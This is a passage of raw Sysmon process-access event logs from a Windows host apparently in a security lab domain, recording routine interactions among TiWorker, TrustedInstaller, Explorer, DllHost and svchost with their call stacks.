dll.dll+1ecb9 10341000x80000000000000005921Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.122{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005920Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.107{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005919Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.107{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005918Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.091{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005917Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.091{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005916Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.091{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005915Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.091{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005914Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.075{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005913Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.075{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005912Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.013{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005911Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:24.997{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005910Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:24.997{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006220Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:26.975{266CAFBE-64C5-6064-A500-00000000AE01}43565368C:\Windows\Explorer.EXE{266CAFBE-64D2-6064-B500-00000000AE01}5416C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\SHCORE.dll+35576|C:\Windows\System32\SHCORE.dll+201ef|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a 10341000x80000000000000006219Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:26.975{266CAFBE-64C5-6064-A500-00000000AE01}43565380C:\Windows\Explorer.EXE{266CAFBE-64D2-6064-B500-00000000AE01}5416C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\SHCORE.dll+35576|C:\Windows\System32\SHCORE.dll+201ef|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a 10341000x80000000000000006218Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:26.975{266CAFBE-64C5-6064-A500-00000000AE01}43565380C:\Windows\Explorer.EXE{266CAFBE-64D2-6064-B500-00000000AE01}5416C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\SHCORE.dll+35576|C:\Windows\System32\SHCORE.dll+201ef|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a 10341000x80000000000000006217Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:26.975{266CAFBE-64C5-6064-A500-00000000AE01}43565368C:\Windows\Explorer.EXE{266CAFBE-64D2-6064-B500-00000000AE01}5416C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\SHCORE.dll+35576|C:\Windows\System32\SHCORE.dll+201ef|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a 10341000x80000000000000006216Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:26.975{266CAFBE-64C5-6064-A500-00000000AE01}43565368C:\Windows\Explorer.EXE{266CAFBE-64D2-6064-B500-00000000AE01}5416C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\SHCORE.dll+35576|C:\Windows\System32\SHCORE.dll+201ef|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a 10341000x80000000000000006215Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:26.975{266CAFBE-64C5-6064-A500-00000000AE01}43565368C:\Windows\Explorer.EXE{266CAFBE-64D2-6064-B500-00000000AE01}5416C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\SHCORE.dll+35576|C:\Windows\System32\SHCORE.dll+201ef|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a 10341000x80000000000000006214Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:26.975{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006213Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 